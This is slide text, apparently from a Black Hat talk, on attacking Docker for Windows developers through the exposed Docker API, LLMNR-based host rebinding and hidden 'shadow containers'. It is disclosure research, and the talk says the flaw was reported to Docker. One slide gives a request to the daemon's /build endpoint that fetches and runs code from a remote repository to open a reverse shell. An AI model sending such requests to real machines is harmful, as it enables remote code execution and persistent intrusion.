![Page 1: Well, That Escalated Quickly! - Black Hat · Well, That Escalated Quickly! How abusing the Docker API Led to Remote Code Execution, Same Origin Bypass and Persistence in the Hypervisor](https://reader034.vdocuments.net/reader034/viewer/2022042223/5ec9d6e7b08ec675b567ae69/html5/thumbnails/1.jpg)
Well, That Escalated Quickly!How abusing the Docker API Led to Remote Code Execution, Same Origin Bypass and Persistence in the Hypervisor via Shadow Containers.
Michael Cherny @chernymi Sagie Dulce @SagieSec
![Page 2: Well, That Escalated Quickly! - Black Hat · Well, That Escalated Quickly! How abusing the Docker API Led to Remote Code Execution, Same Origin Bypass and Persistence in the Hypervisor](https://reader034.vdocuments.net/reader034/viewer/2022042223/5ec9d6e7b08ec675b567ae69/html5/thumbnails/2.jpg)
2
WHO ARE WE?
Michael ChernyHead of Research
Aqua Security@chernymi
Sagie DulceSr Security Researcher
Aqua Security@SagieSec
![Page 3: Well, That Escalated Quickly! - Black Hat · Well, That Escalated Quickly! How abusing the Docker API Led to Remote Code Execution, Same Origin Bypass and Persistence in the Hypervisor](https://reader034.vdocuments.net/reader034/viewer/2022042223/5ec9d6e7b08ec675b567ae69/html5/thumbnails/3.jpg)
3
FOCUS
Developers are the new Targets
![Page 4: Well, That Escalated Quickly! - Black Hat · Well, That Escalated Quickly! How abusing the Docker API Led to Remote Code Execution, Same Origin Bypass and Persistence in the Hypervisor](https://reader034.vdocuments.net/reader034/viewer/2022042223/5ec9d6e7b08ec675b567ae69/html5/thumbnails/4.jpg)
4
FOCUS
Developers are the new Targets
Main Course: APT Developer Running Docker
![Page 5: Well, That Escalated Quickly! - Black Hat · Well, That Escalated Quickly! How abusing the Docker API Led to Remote Code Execution, Same Origin Bypass and Persistence in the Hypervisor](https://reader034.vdocuments.net/reader034/viewer/2022042223/5ec9d6e7b08ec675b567ae69/html5/thumbnails/5.jpg)
5
FOCUS
Developers are the new Targets
Main Course: APT Developer Running Docker
New Attacks: Host Rebinding & Shadow Container
![Page 6: Well, That Escalated Quickly! - Black Hat · Well, That Escalated Quickly! How abusing the Docker API Led to Remote Code Execution, Same Origin Bypass and Persistence in the Hypervisor](https://reader034.vdocuments.net/reader034/viewer/2022042223/5ec9d6e7b08ec675b567ae69/html5/thumbnails/6.jpg)
6
MENU
Containers & Container Development
Attacking Developers
Abusing Docker API
Host Rebinding Attack
Shadow Containers
Full Attack -> Click 2 PWN
Conclusions
①
②
③
![Page 7: Well, That Escalated Quickly! - Black Hat · Well, That Escalated Quickly! How abusing the Docker API Led to Remote Code Execution, Same Origin Bypass and Persistence in the Hypervisor](https://reader034.vdocuments.net/reader034/viewer/2022042223/5ec9d6e7b08ec675b567ae69/html5/thumbnails/7.jpg)
CONTAINERS?
![Page 8: Well, That Escalated Quickly! - Black Hat · Well, That Escalated Quickly! How abusing the Docker API Led to Remote Code Execution, Same Origin Bypass and Persistence in the Hypervisor](https://reader034.vdocuments.net/reader034/viewer/2022042223/5ec9d6e7b08ec675b567ae69/html5/thumbnails/8.jpg)
8
VIRTUAL MACHINES VS CONTAINERS
www.serverspace.co.uk/blog/containerisation-vs-virtualisation-whats-the-difference
![Page 9: Well, That Escalated Quickly! - Black Hat · Well, That Escalated Quickly! How abusing the Docker API Led to Remote Code Execution, Same Origin Bypass and Persistence in the Hypervisor](https://reader034.vdocuments.net/reader034/viewer/2022042223/5ec9d6e7b08ec675b567ae69/html5/thumbnails/9.jpg)
9
CONTAINERS EVERYWHERE
Linux Containers
Linux / Windows / Mac
Windows Containers
Native / Hyper-V (Windows Server)
Hyper-V (windows 10)
![Page 10: Well, That Escalated Quickly! - Black Hat · Well, That Escalated Quickly! How abusing the Docker API Led to Remote Code Execution, Same Origin Bypass and Persistence in the Hypervisor](https://reader034.vdocuments.net/reader034/viewer/2022042223/5ec9d6e7b08ec675b567ae69/html5/thumbnails/10.jpg)
10
CONTAINER ADOPTION STATS
https://www.slideshare.net/Docker/dockercon-2017-general-session-day-1-ben-golub
![Page 11: Well, That Escalated Quickly! - Black Hat · Well, That Escalated Quickly! How abusing the Docker API Led to Remote Code Execution, Same Origin Bypass and Persistence in the Hypervisor](https://reader034.vdocuments.net/reader034/viewer/2022042223/5ec9d6e7b08ec675b567ae69/html5/thumbnails/11.jpg)
11
DEVELOPERS AS TARGETS
High privileges on their machines & domain
Low security attention
High Confidence
Access to sensitive data
Code
IP
Registries
![Page 12: Well, That Escalated Quickly! - Black Hat · Well, That Escalated Quickly! How abusing the Docker API Led to Remote Code Execution, Same Origin Bypass and Persistence in the Hypervisor](https://reader034.vdocuments.net/reader034/viewer/2022042223/5ec9d6e7b08ec675b567ae69/html5/thumbnails/12.jpg)
12
DEVELOPERS AS TARGETS
![Page 13: Well, That Escalated Quickly! - Black Hat · Well, That Escalated Quickly! How abusing the Docker API Led to Remote Code Execution, Same Origin Bypass and Persistence in the Hypervisor](https://reader034.vdocuments.net/reader034/viewer/2022042223/5ec9d6e7b08ec675b567ae69/html5/thumbnails/13.jpg)
13
DEVELOPERS AS TARGETS
![Page 14: Well, That Escalated Quickly! - Black Hat · Well, That Escalated Quickly! How abusing the Docker API Led to Remote Code Execution, Same Origin Bypass and Persistence in the Hypervisor](https://reader034.vdocuments.net/reader034/viewer/2022042223/5ec9d6e7b08ec675b567ae69/html5/thumbnails/14.jpg)
ATTACK OVERVIEW
ATTACKING CONTAINER DEVELOPERS
![Page 15: Well, That Escalated Quickly! - Black Hat · Well, That Escalated Quickly! How abusing the Docker API Led to Remote Code Execution, Same Origin Bypass and Persistence in the Hypervisor](https://reader034.vdocuments.net/reader034/viewer/2022042223/5ec9d6e7b08ec675b567ae69/html5/thumbnails/15.jpg)
15
ATTACK OVERVIEW
![Page 16: Well, That Escalated Quickly! - Black Hat · Well, That Escalated Quickly! How abusing the Docker API Led to Remote Code Execution, Same Origin Bypass and Persistence in the Hypervisor](https://reader034.vdocuments.net/reader034/viewer/2022042223/5ec9d6e7b08ec675b567ae69/html5/thumbnails/16.jpg)
16
ATTACK OVERVIEW
![Page 17: Well, That Escalated Quickly! - Black Hat · Well, That Escalated Quickly! How abusing the Docker API Led to Remote Code Execution, Same Origin Bypass and Persistence in the Hypervisor](https://reader034.vdocuments.net/reader034/viewer/2022042223/5ec9d6e7b08ec675b567ae69/html5/thumbnails/17.jpg)
17
ATTACK OVERVIEW – WINDOWS 10
Abuse Docker API
Host Rebinding
Shadow Container
Remote Code Execution
Privilege Escalation
Persistency
①
②
③
![Page 18: Well, That Escalated Quickly! - Black Hat · Well, That Escalated Quickly! How abusing the Docker API Led to Remote Code Execution, Same Origin Bypass and Persistence in the Hypervisor](https://reader034.vdocuments.net/reader034/viewer/2022042223/5ec9d6e7b08ec675b567ae69/html5/thumbnails/18.jpg)
ABUSING DOCKER API
FROM A MALICIOUS WEB PAGE ①
![Page 19: Well, That Escalated Quickly! - Black Hat · Well, That Escalated Quickly! How abusing the Docker API Led to Remote Code Execution, Same Origin Bypass and Persistence in the Hypervisor](https://reader034.vdocuments.net/reader034/viewer/2022042223/5ec9d6e7b08ec675b567ae69/html5/thumbnails/19.jpg)
19
DOCKER 4 WINDOWS / MAC
Client talks to daemon
over via REST API
UNIX socket
named pipe
..or TCP port
TCP port was default
on Windows 10
![Page 20: Well, That Escalated Quickly! - Black Hat · Well, That Escalated Quickly! How abusing the Docker API Led to Remote Code Execution, Same Origin Bypass and Persistence in the Hypervisor](https://reader034.vdocuments.net/reader034/viewer/2022042223/5ec9d6e7b08ec675b567ae69/html5/thumbnails/20.jpg)
20
DOCKER 4 WINDOWS / MAC
Client talks to daemon
over via REST API
UNIX socket
named pipe
..or TCP port
TCP port was default
on Windows 10
Abuse Remotely?
![Page 21: Well, That Escalated Quickly! - Black Hat · Well, That Escalated Quickly! How abusing the Docker API Led to Remote Code Execution, Same Origin Bypass and Persistence in the Hypervisor](https://reader034.vdocuments.net/reader034/viewer/2022042223/5ec9d6e7b08ec675b567ae69/html5/thumbnails/21.jpg)
21
DOCKER REST API – CAN WE ATTACK IT?
It’s complicated
Same Origin Policy?!
![Page 22: Well, That Escalated Quickly! - Black Hat · Well, That Escalated Quickly! How abusing the Docker API Led to Remote Code Execution, Same Origin Bypass and Persistence in the Hypervisor](https://reader034.vdocuments.net/reader034/viewer/2022042223/5ec9d6e7b08ec675b567ae69/html5/thumbnails/22.jpg)
22
BROWSER SECURITY
Browsers need to display content from multiple domains
But, one domain shouldn’t be able to read / write to another
Post status in Facebook
Collect underpants...
etc.
![Page 23: Well, That Escalated Quickly! - Black Hat · Well, That Escalated Quickly! How abusing the Docker API Led to Remote Code Execution, Same Origin Bypass and Persistence in the Hypervisor](https://reader034.vdocuments.net/reader034/viewer/2022042223/5ec9d6e7b08ec675b567ae69/html5/thumbnails/23.jpg)
23
SAME ORIGIN POLICY (SOP)
Only “simple” requests are allowed across origins
GET – can’t read response body
POST – can’t send with a body / not all header types
HEAD
Not same origin:
request has different domain, protocol or port
![Page 24: Well, That Escalated Quickly! - Black Hat · Well, That Escalated Quickly! How abusing the Docker API Led to Remote Code Execution, Same Origin Bypass and Persistence in the Hypervisor](https://reader034.vdocuments.net/reader034/viewer/2022042223/5ec9d6e7b08ec675b567ae69/html5/thumbnails/24.jpg)
24
DOCKER API CALLS THAT DON’T VIOLATE SOP
List containers (GET)
Inspect container (GET)
List processes in container (GET)
Get container logs (GET)
Get container’s changes in filesystem (GET)
Export container (GET)
Get container stats (GET)
Resize Container (POST)
Start Container (POST)
List images (GET)
Build image (POST)
Create image (POST)
Get image history (GET)
Push image (POST)
Stop Container (POST)
Restart container (POST)
Kill a container (POST)
Rename container (POST)
Pause container (POST)
Unpause container (POST)
Attach to a container (POST)
Get file info in a container (HEAD)
Get filesystem archive (GET)
Delete Container (POST)
List networks (GET)
Inspect Network (GET)
Tag image (POST)
List volumes (GET)
Export image (GET)
Inspect volume (GET)
List secrets (GET)
Create secret (POST)
Inspect secret (GET)
Inspect Swarm (GET)
List nodes (GET)
Inspect node (GET)
List services (GET)
Inspect service (GET)
Get service logs (GET)
List tasks (GET)
Inspect a task (GET)
Search image (GET)
Delete image (DELETE)
https://docs.docker.com/engine/api/v1.29/
![Page 25: Well, That Escalated Quickly! - Black Hat · Well, That Escalated Quickly! How abusing the Docker API Led to Remote Code Execution, Same Origin Bypass and Persistence in the Hypervisor](https://reader034.vdocuments.net/reader034/viewer/2022042223/5ec9d6e7b08ec675b567ae69/html5/thumbnails/25.jpg)
25
DOCKER API CALLS THAT DON’T VIOLATE SOP
List containers (GET)
Inspect container (GET)
List processes in container (GET)
Get container logs (GET)
Get container’s changes in filesystem (GET)
Export container (GET)
Get container stats (GET)
Resize Container (POST)
Start Container (POST)
List images (GET)
Build image (POST)
Create image (POST)
Get image history (GET)
Push image (POST)
Stop Container (POST)
Restart container (POST)
Kill a container (POST)
Rename container (POST)
Pause container (POST)
Unpause container (POST)
Attach to a container (POST)
Get file info in a container (HEAD)
Get filesystem archive (GET)
Delete Container (POST)
List networks (GET)
Inspect Network (GET)
Tag image (POST)
List volumes (GET)
Export image (GET)
Inspect volume (GET)
List secrets (GET)
Create secret (POST)
Inspect secret (GET)
Inspect Swarm (GET)
List nodes (GET)
Inspect node (GET)
List services (GET)
Inspect service (GET)
Get service logs (GET)
List tasks (GET)
Inspect a task (GET)
Search image (GET)
Delete image (DELETE)
https://docs.docker.com/engine/api/v1.29/
![Page 26: Well, That Escalated Quickly! - Black Hat · Well, That Escalated Quickly! How abusing the Docker API Led to Remote Code Execution, Same Origin Bypass and Persistence in the Hypervisor](https://reader034.vdocuments.net/reader034/viewer/2022042223/5ec9d6e7b08ec675b567ae69/html5/thumbnails/26.jpg)
26
BUILD IMAGE
Build images from Dockerfile
FROM alpine:latest
ADD mycode.sh
RUN apt-get update && apt-get install –y …
RUN ./mycode.sh
![Page 27: Well, That Escalated Quickly! - Black Hat · Well, That Escalated Quickly! How abusing the Docker API Led to Remote Code Execution, Same Origin Bypass and Persistence in the Hypervisor](https://reader034.vdocuments.net/reader034/viewer/2022042223/5ec9d6e7b08ec675b567ae69/html5/thumbnails/27.jpg)
27
BUILD IMAGE
Build images from Dockerfile
… Build == Execute code!
FROM alpine:latest
ADD mycode.sh
RUN apt-get update && apt-get install –y …
RUN ./mycode.sh
Execute Yourself
![Page 28: Well, That Escalated Quickly! - Black Hat · Well, That Escalated Quickly! How abusing the Docker API Led to Remote Code Execution, Same Origin Bypass and Persistence in the Hypervisor](https://reader034.vdocuments.net/reader034/viewer/2022042223/5ec9d6e7b08ec675b567ae69/html5/thumbnails/28.jpg)
28
BUILD IMAGE API CALL
POST /build
No body => no SOP violation!
Interesting build parameters
![Page 29: Well, That Escalated Quickly! - Black Hat · Well, That Escalated Quickly! How abusing the Docker API Led to Remote Code Execution, Same Origin Bypass and Persistence in the Hypervisor](https://reader034.vdocuments.net/reader034/viewer/2022042223/5ec9d6e7b08ec675b567ae69/html5/thumbnails/29.jpg)
29
BUILD IMAGE API CALL
POST /build
No body => no SOP violation!
Interesting build parameters
t (tag)
![Page 30: Well, That Escalated Quickly! - Black Hat · Well, That Escalated Quickly! How abusing the Docker API Led to Remote Code Execution, Same Origin Bypass and Persistence in the Hypervisor](https://reader034.vdocuments.net/reader034/viewer/2022042223/5ec9d6e7b08ec675b567ae69/html5/thumbnails/30.jpg)
30
BUILD IMAGE API CALL
POST /build
No body => no SOP violation!
Interesting build parameters
t (tag)
remote
git repository!
![Page 31: Well, That Escalated Quickly! - Black Hat · Well, That Escalated Quickly! How abusing the Docker API Led to Remote Code Execution, Same Origin Bypass and Persistence in the Hypervisor](https://reader034.vdocuments.net/reader034/viewer/2022042223/5ec9d6e7b08ec675b567ae69/html5/thumbnails/31.jpg)
31
BUILD IMAGE API CALL
POST /build
No body => no SOP violation!
Interesting build parameters
t (tag)
remote
git repository!
networkmode (bridge / host / none)
![Page 32: Well, That Escalated Quickly! - Black Hat · Well, That Escalated Quickly! How abusing the Docker API Led to Remote Code Execution, Same Origin Bypass and Persistence in the Hypervisor](https://reader034.vdocuments.net/reader034/viewer/2022042223/5ec9d6e7b08ec675b567ae69/html5/thumbnails/32.jpg)
32
BUILD IMAGE API CALL REVERSE SHELL DEMO
POST http://localhost:2375/build?
remote=https://github.com/<User>/<Repo>
&networkmode=host
![Page 33: Well, That Escalated Quickly! - Black Hat · Well, That Escalated Quickly! How abusing the Docker API Led to Remote Code Execution, Same Origin Bypass and Persistence in the Hypervisor](https://reader034.vdocuments.net/reader034/viewer/2022042223/5ec9d6e7b08ec675b567ae69/html5/thumbnails/33.jpg)
33
BUILD IMAGE API CALL REVERSE SHELL DEMO
![Page 34: Well, That Escalated Quickly! - Black Hat · Well, That Escalated Quickly! How abusing the Docker API Led to Remote Code Execution, Same Origin Bypass and Persistence in the Hypervisor](https://reader034.vdocuments.net/reader034/viewer/2022042223/5ec9d6e7b08ec675b567ae69/html5/thumbnails/34.jpg)
34
ABUSE DOCKER BUILD
![Page 35: Well, That Escalated Quickly! - Black Hat · Well, That Escalated Quickly! How abusing the Docker API Led to Remote Code Execution, Same Origin Bypass and Persistence in the Hypervisor](https://reader034.vdocuments.net/reader034/viewer/2022042223/5ec9d6e7b08ec675b567ae69/html5/thumbnails/35.jpg)
35
ABUSE DOCKER BUILD
![Page 36: Well, That Escalated Quickly! - Black Hat · Well, That Escalated Quickly! How abusing the Docker API Led to Remote Code Execution, Same Origin Bypass and Persistence in the Hypervisor](https://reader034.vdocuments.net/reader034/viewer/2022042223/5ec9d6e7b08ec675b567ae69/html5/thumbnails/36.jpg)
36
ABUSE DOCKER BUILD
![Page 37: Well, That Escalated Quickly! - Black Hat · Well, That Escalated Quickly! How abusing the Docker API Led to Remote Code Execution, Same Origin Bypass and Persistence in the Hypervisor](https://reader034.vdocuments.net/reader034/viewer/2022042223/5ec9d6e7b08ec675b567ae69/html5/thumbnails/37.jpg)
37
ABUSE DOCKER BUILD
![Page 38: Well, That Escalated Quickly! - Black Hat · Well, That Escalated Quickly! How abusing the Docker API Led to Remote Code Execution, Same Origin Bypass and Persistence in the Hypervisor](https://reader034.vdocuments.net/reader034/viewer/2022042223/5ec9d6e7b08ec675b567ae69/html5/thumbnails/38.jpg)
38
ABUSE DOCKER BUILD
![Page 39: Well, That Escalated Quickly! - Black Hat · Well, That Escalated Quickly! How abusing the Docker API Led to Remote Code Execution, Same Origin Bypass and Persistence in the Hypervisor](https://reader034.vdocuments.net/reader034/viewer/2022042223/5ec9d6e7b08ec675b567ae69/html5/thumbnails/39.jpg)
39
ABUSE DOCKER BUILD
![Page 40: Well, That Escalated Quickly! - Black Hat · Well, That Escalated Quickly! How abusing the Docker API Led to Remote Code Execution, Same Origin Bypass and Persistence in the Hypervisor](https://reader034.vdocuments.net/reader034/viewer/2022042223/5ec9d6e7b08ec675b567ae69/html5/thumbnails/40.jpg)
40
ABUSE DOCKER BUILD DEMO
![Page 41: Well, That Escalated Quickly! - Black Hat · Well, That Escalated Quickly! How abusing the Docker API Led to Remote Code Execution, Same Origin Bypass and Persistence in the Hypervisor](https://reader034.vdocuments.net/reader034/viewer/2022042223/5ec9d6e7b08ec675b567ae69/html5/thumbnails/41.jpg)
41
DOCKER FIX
We disclosed to Docker
TCP now an “opt-in”
![Page 42: Well, That Escalated Quickly! - Black Hat · Well, That Escalated Quickly! How abusing the Docker API Led to Remote Code Execution, Same Origin Bypass and Persistence in the Hypervisor](https://reader034.vdocuments.net/reader034/viewer/2022042223/5ec9d6e7b08ec675b567ae69/html5/thumbnails/42.jpg)
HOST REBINDING ATTACK
DAEMON PRIVILEGE ESCALATION ②
![Page 43: Well, That Escalated Quickly! - Black Hat · Well, That Escalated Quickly! How abusing the Docker API Led to Remote Code Execution, Same Origin Bypass and Persistence in the Hypervisor](https://reader034.vdocuments.net/reader034/viewer/2022042223/5ec9d6e7b08ec675b567ae69/html5/thumbnails/43.jpg)
43
WHAT’S NEXT?
![Page 44: Well, That Escalated Quickly! - Black Hat · Well, That Escalated Quickly! How abusing the Docker API Led to Remote Code Execution, Same Origin Bypass and Persistence in the Hypervisor](https://reader034.vdocuments.net/reader034/viewer/2022042223/5ec9d6e7b08ec675b567ae69/html5/thumbnails/44.jpg)
44
LIMITATIONS
![Page 45: Well, That Escalated Quickly! - Black Hat · Well, That Escalated Quickly! How abusing the Docker API Led to Remote Code Execution, Same Origin Bypass and Persistence in the Hypervisor](https://reader034.vdocuments.net/reader034/viewer/2022042223/5ec9d6e7b08ec675b567ae69/html5/thumbnails/45.jpg)
45
LIMITATIONS
![Page 46: Well, That Escalated Quickly! - Black Hat · Well, That Escalated Quickly! How abusing the Docker API Led to Remote Code Execution, Same Origin Bypass and Persistence in the Hypervisor](https://reader034.vdocuments.net/reader034/viewer/2022042223/5ec9d6e7b08ec675b567ae69/html5/thumbnails/46.jpg)
46
DNS REBINDING?
![Page 47: Well, That Escalated Quickly! - Black Hat · Well, That Escalated Quickly! How abusing the Docker API Led to Remote Code Execution, Same Origin Bypass and Persistence in the Hypervisor](https://reader034.vdocuments.net/reader034/viewer/2022042223/5ec9d6e7b08ec675b567ae69/html5/thumbnails/47.jpg)
47
DNS REBINDING - HISTORY
Carbon Dated to ~1996
2007 Protecting Browsers from DNS Rebinding Attacks
2008 Defending your DNS in a post-Kaminsky world
2010 How to Hack Millions of Routers
![Page 48: Well, That Escalated Quickly! - Black Hat · Well, That Escalated Quickly! How abusing the Docker API Led to Remote Code Execution, Same Origin Bypass and Persistence in the Hypervisor](https://reader034.vdocuments.net/reader034/viewer/2022042223/5ec9d6e7b08ec675b567ae69/html5/thumbnails/48.jpg)
48
DNS REBINDING – HOW IT WORKS
![Page 49: Well, That Escalated Quickly! - Black Hat · Well, That Escalated Quickly! How abusing the Docker API Led to Remote Code Execution, Same Origin Bypass and Persistence in the Hypervisor](https://reader034.vdocuments.net/reader034/viewer/2022042223/5ec9d6e7b08ec675b567ae69/html5/thumbnails/49.jpg)
49
DNS REBINDING – HOW IT WORKS
![Page 50: Well, That Escalated Quickly! - Black Hat · Well, That Escalated Quickly! How abusing the Docker API Led to Remote Code Execution, Same Origin Bypass and Persistence in the Hypervisor](https://reader034.vdocuments.net/reader034/viewer/2022042223/5ec9d6e7b08ec675b567ae69/html5/thumbnails/50.jpg)
50
DNS REBINDING – HOW IT WORKS
![Page 51: Well, That Escalated Quickly! - Black Hat · Well, That Escalated Quickly! How abusing the Docker API Led to Remote Code Execution, Same Origin Bypass and Persistence in the Hypervisor](https://reader034.vdocuments.net/reader034/viewer/2022042223/5ec9d6e7b08ec675b567ae69/html5/thumbnails/51.jpg)
51
DNS REBINDING – HOW IT WORKS
![Page 52: Well, That Escalated Quickly! - Black Hat · Well, That Escalated Quickly! How abusing the Docker API Led to Remote Code Execution, Same Origin Bypass and Persistence in the Hypervisor](https://reader034.vdocuments.net/reader034/viewer/2022042223/5ec9d6e7b08ec675b567ae69/html5/thumbnails/52.jpg)
52
DNS REBINDING – HOW IT WORKS
![Page 53: Well, That Escalated Quickly! - Black Hat · Well, That Escalated Quickly! How abusing the Docker API Led to Remote Code Execution, Same Origin Bypass and Persistence in the Hypervisor](https://reader034.vdocuments.net/reader034/viewer/2022042223/5ec9d6e7b08ec675b567ae69/html5/thumbnails/53.jpg)
53
DNS REBINDING – HOW IT WORKS
![Page 54: Well, That Escalated Quickly! - Black Hat · Well, That Escalated Quickly! How abusing the Docker API Led to Remote Code Execution, Same Origin Bypass and Persistence in the Hypervisor](https://reader034.vdocuments.net/reader034/viewer/2022042223/5ec9d6e7b08ec675b567ae69/html5/thumbnails/54.jpg)
54
DNS REBINDING – HOW IT WORKS
SOP BYPASSED!
![Page 55: Well, That Escalated Quickly! - Black Hat · Well, That Escalated Quickly! How abusing the Docker API Led to Remote Code Execution, Same Origin Bypass and Persistence in the Hypervisor](https://reader034.vdocuments.net/reader034/viewer/2022042223/5ec9d6e7b08ec675b567ae69/html5/thumbnails/55.jpg)
55
WHY NOT USE DNS REBINDING?
DNS Rebinding may fail
Existing protections (perimeter)
Attacker needs to setup domain
$$$
Maintenance
IP Reputation & Threat Intelligence
![Page 56: Well, That Escalated Quickly! - Black Hat · Well, That Escalated Quickly! How abusing the Docker API Led to Remote Code Execution, Same Origin Bypass and Persistence in the Hypervisor](https://reader034.vdocuments.net/reader034/viewer/2022042223/5ec9d6e7b08ec675b567ae69/html5/thumbnails/56.jpg)
56
LLMNR: DNS OVER THE LAN
Name resolution over the LAN
LLMNR
DNS like resolution
IPv4 & IPv6
![Page 57: Well, That Escalated Quickly! - Black Hat · Well, That Escalated Quickly! How abusing the Docker API Led to Remote Code Execution, Same Origin Bypass and Persistence in the Hypervisor](https://reader034.vdocuments.net/reader034/viewer/2022042223/5ec9d6e7b08ec675b567ae69/html5/thumbnails/57.jpg)
57
ATTACKING LLMNR
Requests broadcasted over virtual interface!
Spoof LLMNR Replies
Cached in the browser (IE / Chrome / FF) for ~60 seconds
Skip cache in FF
Delay HTTP response 0.5 sec
https://tools.ietf.org/html/rfc4795#section-2.2
![Page 58: Well, That Escalated Quickly! - Black Hat · Well, That Escalated Quickly! How abusing the Docker API Led to Remote Code Execution, Same Origin Bypass and Persistence in the Hypervisor](https://reader034.vdocuments.net/reader034/viewer/2022042223/5ec9d6e7b08ec675b567ae69/html5/thumbnails/58.jpg)
58
HOST REBINDING DEMO
![Page 59: Well, That Escalated Quickly! - Black Hat · Well, That Escalated Quickly! How abusing the Docker API Led to Remote Code Execution, Same Origin Bypass and Persistence in the Hypervisor](https://reader034.vdocuments.net/reader034/viewer/2022042223/5ec9d6e7b08ec675b567ae69/html5/thumbnails/59.jpg)
59
HOST REBINDING DEMO
![Page 60: Well, That Escalated Quickly! - Black Hat · Well, That Escalated Quickly! How abusing the Docker API Led to Remote Code Execution, Same Origin Bypass and Persistence in the Hypervisor](https://reader034.vdocuments.net/reader034/viewer/2022042223/5ec9d6e7b08ec675b567ae69/html5/thumbnails/60.jpg)
60
HOST REBINDING DEMO
![Page 61: Well, That Escalated Quickly! - Black Hat · Well, That Escalated Quickly! How abusing the Docker API Led to Remote Code Execution, Same Origin Bypass and Persistence in the Hypervisor](https://reader034.vdocuments.net/reader034/viewer/2022042223/5ec9d6e7b08ec675b567ae69/html5/thumbnails/61.jpg)
61
HOST REBINDING DEMO
![Page 62: Well, That Escalated Quickly! - Black Hat · Well, That Escalated Quickly! How abusing the Docker API Led to Remote Code Execution, Same Origin Bypass and Persistence in the Hypervisor](https://reader034.vdocuments.net/reader034/viewer/2022042223/5ec9d6e7b08ec675b567ae69/html5/thumbnails/62.jpg)
62
HOST REBINDING DEMO
![Page 63: Well, That Escalated Quickly! - Black Hat · Well, That Escalated Quickly! How abusing the Docker API Led to Remote Code Execution, Same Origin Bypass and Persistence in the Hypervisor](https://reader034.vdocuments.net/reader034/viewer/2022042223/5ec9d6e7b08ec675b567ae69/html5/thumbnails/63.jpg)
63
HOST REBINDING DEMO
![Page 64: Well, That Escalated Quickly! - Black Hat · Well, That Escalated Quickly! How abusing the Docker API Led to Remote Code Execution, Same Origin Bypass and Persistence in the Hypervisor](https://reader034.vdocuments.net/reader034/viewer/2022042223/5ec9d6e7b08ec675b567ae69/html5/thumbnails/64.jpg)
64
HOST REBINDING DEMO
![Page 65: Well, That Escalated Quickly! - Black Hat · Well, That Escalated Quickly! How abusing the Docker API Led to Remote Code Execution, Same Origin Bypass and Persistence in the Hypervisor](https://reader034.vdocuments.net/reader034/viewer/2022042223/5ec9d6e7b08ec675b567ae69/html5/thumbnails/65.jpg)
65
HOST REBINDING DEMO
![Page 66: Well, That Escalated Quickly! - Black Hat · Well, That Escalated Quickly! How abusing the Docker API Led to Remote Code Execution, Same Origin Bypass and Persistence in the Hypervisor](https://reader034.vdocuments.net/reader034/viewer/2022042223/5ec9d6e7b08ec675b567ae69/html5/thumbnails/66.jpg)
66
HOST REBINDING DEMO
![Page 67: Well, That Escalated Quickly! - Black Hat · Well, That Escalated Quickly! How abusing the Docker API Led to Remote Code Execution, Same Origin Bypass and Persistence in the Hypervisor](https://reader034.vdocuments.net/reader034/viewer/2022042223/5ec9d6e7b08ec675b567ae69/html5/thumbnails/67.jpg)
67
HOST REBINDING DEMO
SOP BYPASSED!
![Page 68: Well, That Escalated Quickly! - Black Hat · Well, That Escalated Quickly! How abusing the Docker API Led to Remote Code Execution, Same Origin Bypass and Persistence in the Hypervisor](https://reader034.vdocuments.net/reader034/viewer/2022042223/5ec9d6e7b08ec675b567ae69/html5/thumbnails/68.jpg)
68
HOST REBINDING DEMO
SOP BYPASSED!
![Page 69: Well, That Escalated Quickly! - Black Hat · Well, That Escalated Quickly! How abusing the Docker API Led to Remote Code Execution, Same Origin Bypass and Persistence in the Hypervisor](https://reader034.vdocuments.net/reader034/viewer/2022042223/5ec9d6e7b08ec675b567ae69/html5/thumbnails/69.jpg)
69
HOST REBINDING DEMO
SOP BYPASSED!
![Page 70: Well, That Escalated Quickly! - Black Hat · Well, That Escalated Quickly! How abusing the Docker API Led to Remote Code Execution, Same Origin Bypass and Persistence in the Hypervisor](https://reader034.vdocuments.net/reader034/viewer/2022042223/5ec9d6e7b08ec675b567ae69/html5/thumbnails/70.jpg)
70
HOST REBINDING DEMO
![Page 71: Well, That Escalated Quickly! - Black Hat · Well, That Escalated Quickly! How abusing the Docker API Led to Remote Code Execution, Same Origin Bypass and Persistence in the Hypervisor](https://reader034.vdocuments.net/reader034/viewer/2022042223/5ec9d6e7b08ec675b567ae69/html5/thumbnails/71.jpg)
71
RECAP
Full API Access: docker run …?
Abuse Docker API
Host Rebinding
Remote Code Execution
Privilege Escalation
①
②
![Page 72: Well, That Escalated Quickly! - Black Hat · Well, That Escalated Quickly! How abusing the Docker API Led to Remote Code Execution, Same Origin Bypass and Persistence in the Hypervisor](https://reader034.vdocuments.net/reader034/viewer/2022042223/5ec9d6e7b08ec675b567ae69/html5/thumbnails/72.jpg)
SHADOW CONTAINER
PERSISTENCE & CONCEALMENT③
![Page 73: Well, That Escalated Quickly! - Black Hat · Well, That Escalated Quickly! How abusing the Docker API Led to Remote Code Execution, Same Origin Bypass and Persistence in the Hypervisor](https://reader034.vdocuments.net/reader034/viewer/2022042223/5ec9d6e7b08ec675b567ae69/html5/thumbnails/73.jpg)
73
MISSING PERSISTENCE & CONCEALMENT
So Far…
Privileged container on the VM (Moby Linux)
Access to VM filesystem
Access to enterprise internal network
But…
Not Concealed: docker ps
Not Persistent: VM boots from image
![Page 74: Well, That Escalated Quickly! - Black Hat · Well, That Escalated Quickly! How abusing the Docker API Led to Remote Code Execution, Same Origin Bypass and Persistence in the Hypervisor](https://reader034.vdocuments.net/reader034/viewer/2022042223/5ec9d6e7b08ec675b567ae69/html5/thumbnails/74.jpg)
74
PERSISTENT AND CONCEALED
myscript
![Page 75: Well, That Escalated Quickly! - Black Hat · Well, That Escalated Quickly! How abusing the Docker API Led to Remote Code Execution, Same Origin Bypass and Persistence in the Hypervisor](https://reader034.vdocuments.net/reader034/viewer/2022042223/5ec9d6e7b08ec675b567ae69/html5/thumbnails/75.jpg)
75
PERSISTENT AND CONCEALED
shadow
![Page 76: Well, That Escalated Quickly! - Black Hat · Well, That Escalated Quickly! How abusing the Docker API Led to Remote Code Execution, Same Origin Bypass and Persistence in the Hypervisor](https://reader034.vdocuments.net/reader034/viewer/2022042223/5ec9d6e7b08ec675b567ae69/html5/thumbnails/76.jpg)
76
PERSISTENT AND CONCEALED
shadow
![Page 77: Well, That Escalated Quickly! - Black Hat · Well, That Escalated Quickly! How abusing the Docker API Led to Remote Code Execution, Same Origin Bypass and Persistence in the Hypervisor](https://reader034.vdocuments.net/reader034/viewer/2022042223/5ec9d6e7b08ec675b567ae69/html5/thumbnails/77.jpg)
77
PERSISTENT AND CONCEALED
myscript
